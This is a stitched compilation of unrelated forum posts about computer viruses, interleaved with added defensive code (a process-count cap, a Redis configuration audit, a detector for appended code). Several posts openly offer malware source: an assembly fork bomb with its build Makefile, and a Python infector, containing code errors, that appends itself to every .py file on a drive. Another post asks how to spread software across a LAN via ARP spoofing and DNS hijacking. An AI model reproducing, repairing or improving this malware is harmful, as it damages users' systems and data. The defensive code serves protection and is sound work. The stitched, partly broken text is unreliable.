virus – Getting a lot of daily trojan warnings from antivirus coming from the same IPs and they contain weird databases?

This is a very weird situation and I am frankly at a loss.
For a while now, I have been getting multiple daily trojan warnings from my antivirus (Malwarebytes). The IPs my web guard continuously blocks are very similar. Here is a list of them:

193.57.40.222    **
113.59.224.77
201.132.110.134  **
202.83.19.248
111.75.54.86
etc.

** The first and third IPs are apparently random Apache servers, one in Ukraine and one in Mexico. The third one is what is most interesting to me. For some reason, if you go to it, you can log onto a database via their phpMyAdmin and see loads of random information, including databases of usernames and passwords. This database seems to also be connected to a website called “megared.net.mx”.

What is happening here? And why am I getting “trojans” from these IPs every single day?!

Thanks for any clarification…

Fork Bomb virus in Assembly

I made a fork bomb virus in Assembly. Now, I want to make my code better.

Here is my code:

section .text
    global _start

_start:
    mov eax, 2
    int 0x80
    jmp _start

Makefile:

DIR=build
$(shell mkdir -p $(DIR))
$(shell nasm -f elf64 Program.asm -o Program.o)
$(shell ld Program.o -o build/ForkBomb)
$(shell rm Program.o)
$(shell echo "run.sh" > build/run.sh)
$(shell echo "./build/ForkBomb" > build/run.sh)
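The mitigation a defender reaches for against a fork bomb is a ceiling on how many processes a user may own (the shell equivalent is `ulimit -u`). The following is an added example, not code from the post above: it launches a program under a lowered RLIMIT_NPROC soft limit using a preexec hook, so the launched program and everything it forks hits EAGAIN at the cap instead of exhausting the process table. The reporter command is a hypothetical stand-in that only prints the limit it inherited; it assumes a POSIX system where Python's resource module is available, and RLIMIT_NPROC is counted per user, so the cap is measured against all of that user's processes.

```python
import resource
import subprocess
import sys


def _cap_process_count(max_procs):
    """Return a preexec hook that lowers RLIMIT_NPROC for the child.

    The hook runs after fork() and before exec(), so it affects only the
    launched program and whatever that program forks later.  Only the soft
    limit is lowered (never raised); the hard limit is left untouched.
    """
    def hook():
        soft, hard = resource.getrlimit(resource.RLIMIT_NPROC)
        new_soft = max_procs
        if hard != resource.RLIM_INFINITY:
            new_soft = min(new_soft, hard)
        if soft != resource.RLIM_INFINITY:
            new_soft = min(new_soft, soft)
        resource.setrlimit(resource.RLIMIT_NPROC, (new_soft, hard))
    return hook


def run_with_process_cap(argv, max_procs=64, timeout=10):
    """Run argv under a per-user process cap; return (exit code, stdout).

    A program that forks in a loop gets EAGAIN from fork() once the user's
    process count reaches the cap, which contains the damage.
    """
    proc = subprocess.run(
        argv,
        preexec_fn=_cap_process_count(max_procs),
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return proc.returncode, proc.stdout.strip()


# Hypothetical child for the demonstration: it prints the soft RLIMIT_NPROC
# it was started with.  A real untrusted binary would go in argv instead.
REPORT_LIMIT = [
    sys.executable, "-c",
    "import resource; print(resource.getrlimit(resource.RLIMIT_NPROC)[0])",
]


def child_limit(max_procs=64):
    """Launch the reporter under the cap and return the limit it observed."""
    code, out = run_with_process_cap(REPORT_LIMIT, max_procs=max_procs)
    if code != 0:
        raise RuntimeError("child failed to report its limit")
    return int(out)


if __name__ == "__main__":
    print("child RLIMIT_NPROC soft limit:", child_limit(64))
```

Because the limit is per user rather than per process, a fork bomb started by the same account from an uncapped shell is not contained by this; the durable fix is the same cap applied at login via limits.conf or the service manager.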

virus – Hacked through Redis — red2.so

I’ve been building a web server (using Ruby on Rails) that uses Redis on my macOS machine. I’ve been using Redis locally on the default port without a password because I didn’t think it was accessible from the internet.

It appears I was wrong: after taking a break from my computer and returning to my terminal session, I noticed a new file git hadn’t yet tracked called red2.so. Redis creates a dump.rdb file regularly which I often delete, so I almost did so for this new file as well, thinking it was just one of those pesky files Redis creates sometimes, but luckily I decided at the last minute to investigate.

I open my Redis logs and what do I see? Somebody established a connection with my running Redis instance and started what appears to be called a “master-slave sync.” Something about “replication.” Some 50kb of something were sent to my computer. After that, a bunch of error messages saying stuff like “Error condition on socket for SYNC: Connection reset by peer,” or “Error reply to PING from master: ‘-Reading from master: Operation now in progress.’” Then one last message saying “MASTER MODE enabled” with information relating to an IP address, including the flag “cmd=slaveof.”

According to the logs, which are timestamped, the above took all of ~8 seconds, which I’m guessing means that the attack was automated, not manual. 40 minutes later I see a log entry saying “1 changes in 3600 seconds. Saving…”, which I think was a standard Redis thing that runs periodically.

The Redis dump file looks clean. A quick online search for the suspicious file name “red2.so” suggests that I’ve been hacked through an exploit in open Redis instances introduced by a new feature in recent versions of Redis; that a worm has likely been installed on my computer, and that this vulnerability allows the attacker to execute arbitrary code.

Apparently, this attack has been on the scene for at least about a year, and has been written about:

and asked about:

I don’t understand how this could have happened as my macOS firewall was on.

Does anyone have experience with this attack or heard of it? What do you think the extent of it has been on my machine in terms of damages or snooping, or how I could find out? Should I just replace my machine and not look back (I have somewhat recent backups)? I’m running an anti-virus scan as we speak but any pointers would be appreciated.

I’m running the latest Redis (4.2.5) on macOS Catalina (10.15.7).
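The log lines in the post (the replication sync and the cmd=slaveof entry) together with a dropped .so file point at the configuration a defender checks first: whether the instance is reachable from outside loopback, whether it demands a password, and whether the replication, CONFIG and MODULE commands (Redis loads shared objects only as modules) are still available under their default names. The following audit script is an added example, not the project's code and not Redis tooling: it parses redis.conf-style text and flags those settings. Both configurations are constructed for the example, and the requirepass value is a placeholder.

```python
LOOPBACK = {"127.0.0.1", "::1", "-::1", "localhost"}
# Commands an attacker with a bare connection used in the post's scenario
# (replication) or commonly chains with it (CONFIG SET dir/dbfilename,
# MODULE LOAD); renaming them to "" disables them.
SENSITIVE_COMMANDS = ("slaveof", "replicaof", "config", "module", "debug")


def parse_redis_conf(text):
    """Return {directive: [values...]} from redis.conf-style text.

    Lines starting with '#' and blank lines are skipped; directives that may
    repeat (bind, rename-command) accumulate every value in order.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)
    return conf


def audit_redis_conf(text):
    """Return a list of 'SEVERITY: finding' strings for risky settings."""
    conf = parse_redis_conf(text)
    findings = []

    bind_tokens = [t for v in conf.get("bind", []) for t in v.split()]
    if not bind_tokens:
        findings.append("HIGH: no 'bind' directive; Redis listens on every interface")
    elif any(t not in LOOPBACK for t in bind_tokens):
        findings.append("HIGH: bind includes a non-loopback address: " + " ".join(bind_tokens))

    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("HIGH: protected-mode is off")

    if not conf.get("requirepass", [""])[-1]:
        findings.append("HIGH: no requirepass; any client that connects can run commands")

    renamed = {v.split()[0].lower() for v in conf.get("rename-command", []) if v.split()}
    for cmd in SENSITIVE_COMMANDS:
        if cmd not in renamed:
            findings.append(f"MEDIUM: '{cmd}' is still exposed under its default name")
    return findings


# Constructed sample: a development setup like the one in the post.
WEAK_CONF = """
# no bind, no password, protected mode switched off
port 6379
protected-mode no
"""

# Constructed sample: the same instance restricted to loopback and a password,
# with the dangerous commands disabled.  The password is a placeholder.
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command CONFIG ""
rename-command MODULE ""
rename-command DEBUG ""
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name + ":")
        for finding in audit_redis_conf(text) or ["no findings"]:
            print("  " + finding)
```

A macOS application firewall decides per application which inbound connections to allow; a server process that has been permitted (or that is queried over a forwarded port) is reachable regardless, so the bind address and password in the instance's own configuration are the controls to rely on.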

virus – Is malware distributed with pirated software actually common?

Downloading pirated software is a crime in many countries and visiting websites involved with pirating puts you at risk of getting viruses not only from the software itself, but also from rogue advertising since criminal gangs are involved.

Regardless of the fact that many people download and run the pirated software and movies, nearly all of them contain some kind of malware. Moreover, these trojans hide themselves from detection pretty well, as nobody cares about chasing malware in pirated content.
Even if an antivirus grabs one, users normally put it into the exceptions and don’t care, based on the assumption that “antiviruses don’t like cracked software”, while in fact, cracked software and free movies do contain malware.

The file does not need to be executable to infect your PC. Normally it contains only a minimal payload in any type of file which then exploits a vulnerability in your PC so it can run and then it downloads the rest from the internet.

Also, extremely bad things happen sometimes. The best example was a pirated version of Xcode for macOS which was backdoored and went undetected for a long time in China. It wasn’t classical piracy, it was just an unauthorized download, so if you have a chance to download authorized software, do so.

See this: China's Awful Internet Speed Has Spread Malware to Millions of Smartphones, and this: Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store

Note that it wasn’t typical malware, but it was modified development stack which basically hid malware in numerous applications built with it and then spread onto mobile devices via the AppStore. So it was a free application, but unauthorized – that’s why it’s best to get only valid content.

Regarding legal software and malware, such as Windows 10, there have been rumors that Microsoft can read any data from your hard drive, which isn’t true. The quoted text from the EULA which was published on many websites was modified by removing important words, so that the whole sentence has an incorrect meaning. The point is that when you are using online services like Outlook365 or Google Drive, you send that data to the provider. However, this data is encrypted during transfer and at rest in the cloud, and the key is derived from your password. For criminals it’s easier to break into your PC than into the cloud.

Finally, the answer to your question based on statistical data from BitTorrent would be “Yes”. I can’t publish in which torrents I have found it – just how I found it. For example, I got one WMV file which wasn’t detected by Panda, but then it downloaded another payload which was detected by Panda but not by Avast. In another instance, there was a program downloaded which had remote control built in and it was contacting a host on the internet, which was detected by the IDS. In another instance, the downloaded key logger software had a backdoor which was neutralized by Kaspersky AV.

I’d suggest trying trials and free games. There are more of them every year and these are very often full-fledged products. You can also obtain free games during promotions and competitions. Very often there are lowered prices some time after the product is released (e.g. on Amazon). There are also many promotions in many online stores during certain periods of the year. Note that this is the case for the most well-known and reputable sources. Any unknown website selling cheap software is very likely selling pirated copies, and very likely with embedded Trojans. Try to pay less for the hardware; it’s a lot cheaper today, and you can buy very good business laptops and desktops for a third of the price.

virus – Is my Windows 10 infected with malware?

When I use Google Chrome, about 5 different McAfee notifications occasionally appear (I don’t have McAfee installed); one of them:

ATTENTION! Your computer is in danger. We detected a virus on your computer. You need to remove viruses from your computer. The system is infected. Click here to clean 22.39 uelihaldiscret.online. Open. X Remove propagant.


“Application Erro. The instruction in 0x00007FFC3C0241C1 retained the memory in 0x0000000000000000, The memory cannot be read. Click ‘OK’ to end the program. OK.”

What am I supposed to do? When I click to close it, two sites open: http://lp3.clean-pc-now.club/ and antivirushub.co, but my Avast add-on blocks these sites.

python – simple self-replicating virus

I made a virus that copies itself to any .py file it sees. It isn’t very fancy, but it does the job. I was wondering if a) you guys could give any feedback or whatever and b) if you know of any resources to learn how to make viruses (not for anything bad of course… 😀 ).

import os


class Virus:
    def __init__(self, path):
        self.this_file = open(__file__)
        self.list_of_files = ()
        self.make_list_of_files(path)
        for file in self.list_of_files:
            self.infect(file)

    def infect(self, file_name):
        file_to_infect = open(file_name, "a+")
        file_to_infect.write('\n')  # first we make a line break in case there is no line break at the end
        # of the infected file
        for line in self.this_file:
            file_to_infect.write(line)
        file_to_infect.close()

    def make_list_of_files(self, path):
        dirs = os.listdir(path)
        for directory in dirs:
            if os.path.isdir(path + '\\' + directory):
                self.make_list_of_files(path + '\\' + directory)
            elif directory(-3:) == '.py':
                self.list_of_files.append(path + '\\' + directory)


virus = Virus("C:\\")  # don't run this without changing the file to something
# that won't wreck all of your python files
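An appending infector of this kind leaves a tell that is easy to check for during cleanup: every victim ends with the same block of lines, and independent source files almost never share a long identical suffix. The following detector is an added example, not code from the post: it fingerprints the trailing lines of every .py file under a directory and reports groups of files whose tails are identical. The sample tree it writes into a temporary directory is constructed for the demonstration (two unrelated scripts with the same block appended, one untouched file).

```python
import hashlib
import os
import tempfile

TAIL_LINES = 12  # length of the trailing block compared between files


def tail_fingerprint(path, n=TAIL_LINES):
    """SHA-256 of the last n non-blank lines of a text file, or None if shorter."""
    with open(path, "r", errors="replace") as fh:
        lines = [ln.rstrip() for ln in fh if ln.strip()]
    if len(lines) < n:
        return None
    return hashlib.sha256("\n".join(lines[-n:]).encode()).hexdigest()


def find_shared_tails(root, n=TAIL_LINES):
    """Group .py files under root that end with an identical n-line block.

    Returns {fingerprint: [paths...]} containing only groups of two or more
    files; those are the candidates for having been appended to.
    """
    groups = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".py"):
                full = os.path.join(dirpath, name)
                fp = tail_fingerprint(full, n)
                if fp:
                    groups.setdefault(fp, []).append(full)
    return {fp: sorted(paths) for fp, paths in groups.items() if len(paths) > 1}


# Constructed sample tree: two distinct scripts with the same 12-line block
# appended (what a file-appending infector leaves behind) and one clean file.
APPENDED_BLOCK = "\n".join(f"# appended line {i}" for i in range(TAIL_LINES)) + "\n"
SAMPLES = {
    "a/util.py": "def add(a, b):\n    return a + b\n" + APPENDED_BLOCK,
    "b/app.py": "import sys\nprint(sys.argv)\n" + APPENDED_BLOCK,
    "b/clean.py": "x = 1\n" + "\n".join(f"y{i} = {i}" for i in range(20)) + "\n",
}


def demo():
    """Write the sample tree to a temp dir; return the groups as relative paths."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(body)
        hits = find_shared_tails(root)
        return [[os.path.relpath(p, root).replace(os.sep, "/") for p in paths]
                for paths in hits.values()]


if __name__ == "__main__":
    for group in demo():
        print("identical trailing block in:", group)
```

The heuristic is deliberately signature-free, so it also catches a variant whose body differs from the one above; the cost is that a generated boilerplate footer shared by many legitimate files will show up too, which is why the output is a list of groups to inspect rather than files to delete.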

How can a virus spread in a local network?

I need to distribute an application to many computers in a local network.
I’ve thought of ARP spoofing and then DNS hijacking, where a site would initiate a download. Of course, it won’t be that dull. But I also want to look at different options, the thing is that I don’t know of alternative ways. Are there other ways to do it?

Anti-virus software in the world, which one did you use before or now?

Share with you my collection of anti-virus software list here:
1. BitDefender Antivirus 2010
US$24.95
http://www.bitdefender.com/
2. Kaspersky Anti-Virus 2010
US$59.95
http://www.kaspersky.com/
3. Webroot AntiVirus with SpySweeper 2010
US$29.95
http://www.Webroot.com
4. Norton AntiVirus 2010
US$39.99
http://www.symantec.com/
5. ESET Nod32 Antivirus 4
US$39.99
http://www.eset.com/
6. AVG Anti-Virus 9
US$34.99…
antivirus – How can antiviruses protect our computers if virus maker checks them with antiviruses?

Because we know that the antivirus can detect what it was tested to detect.

There is no “silver bullet” in security. There is no one thing that will magically protect everyone from everything in the future. Security is about reducing risks and defending against specific threats.

And eventually, the antivirus makers will be able to detect the new virus. So, really, all you are worried about is the window of time where the new virus is released and when the antivirus starts to detect it. And since no virus can hit all computers at once when it is first released, you also get a reduction in risk by the fact that the chances are low that you will ever see a truly new and novel virus that your antivirus will not detect.